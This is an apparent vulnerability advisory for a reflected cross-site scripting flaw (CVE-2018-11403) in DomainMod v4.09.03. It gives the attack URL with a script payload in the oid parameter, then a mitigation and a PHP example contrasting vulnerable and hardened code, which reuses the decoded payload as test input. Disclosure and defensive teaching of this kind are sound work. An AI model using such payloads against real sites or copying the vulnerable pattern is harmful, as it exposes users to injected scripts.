vendor: DomainMod
by: longer
CVSS: 5.4 (MEDIUM)
CWE: 79 (Cross-Site Scripting (XSS))
Product Name: DomainMod
Affected Version From: v4.09.03
Affected Version To: v4.09.03
Patch Exists: YES
Related CVE: CVE-2018-11403
CPE: a:domainmod:domainmod
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
Year: 2018
DomainMod v4.09.03 has XSS via the assets/edit/account-owner.php oid parameter
An issue was discovered in DomainMod v4.09.03. After a user has logged in, opening the URL http://127.0.0.1/assets/edit/account-owner.php?del=1&oid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28973761%29%3C/ScRiPt%3E causes the XSS payload carried in the oid parameter to be executed in the browser.
Mitigation:
Validate and sanitize all user-supplied input, and encode it for the output context in which it is rendered, before the application uses or reflects it.
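As an added illustration of that mitigation (not DomainMod's own code), the following PHP contrasts the reflection pattern behind this class of bug with a validated and encoded version. It assumes the oid query parameter is a numeric record id that account-owner.php writes back into its HTML; the function and field names are hypothetical.

```php
<?php
// Added example, not DomainMod's code. Assumes account-owner.php reflects the
// oid query parameter into its HTML response; names here are hypothetical.

// Vulnerable pattern: the raw query-string value is concatenated into HTML,
// so a script tag supplied in oid is rendered and executed by the browser.
function render_owner_id_vulnerable(array $get): string
{
    $oid = isset($get['oid']) ? $get['oid'] : '';
    return '<input type="hidden" name="oid" value="' . $oid . '">';
}

// Hardened pattern, two independent layers:
//  1. validate: oid must be a positive integer id, anything else is rejected;
//  2. encode: whatever is reflected is entity-encoded for the attribute context,
//     so even a future non-numeric field cannot break out of the quotes.
function render_owner_id_safe(array $get): string
{
    $oid = filter_var($get['oid'] ?? '', FILTER_VALIDATE_INT,
                      ['options' => ['min_range' => 1]]);
    if ($oid === false) {
        // Refuse the request instead of echoing the offending value back.
        http_response_code(400);
        return '<p>Invalid account owner id.</p>';
    }
    $encoded = htmlspecialchars((string) $oid, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="hidden" name="oid" value="' . $encoded . '">';
}

// Constructed input: the advisory's URL parameters in percent-decoded form.
$constructed = [
    'del' => '1',
    'oid' => '\'"()&%<acx><ScRiPt >prompt(973761)</ScRiPt>',
];
echo render_owner_id_vulnerable($constructed), PHP_EOL; // script tag lands in the page
echo render_owner_id_safe($constructed), PHP_EOL;       // rejected with a generic message
```

Running it from the CLI (`php example.php`) shows the first line containing the script tag verbatim and the second returning only the fixed error text.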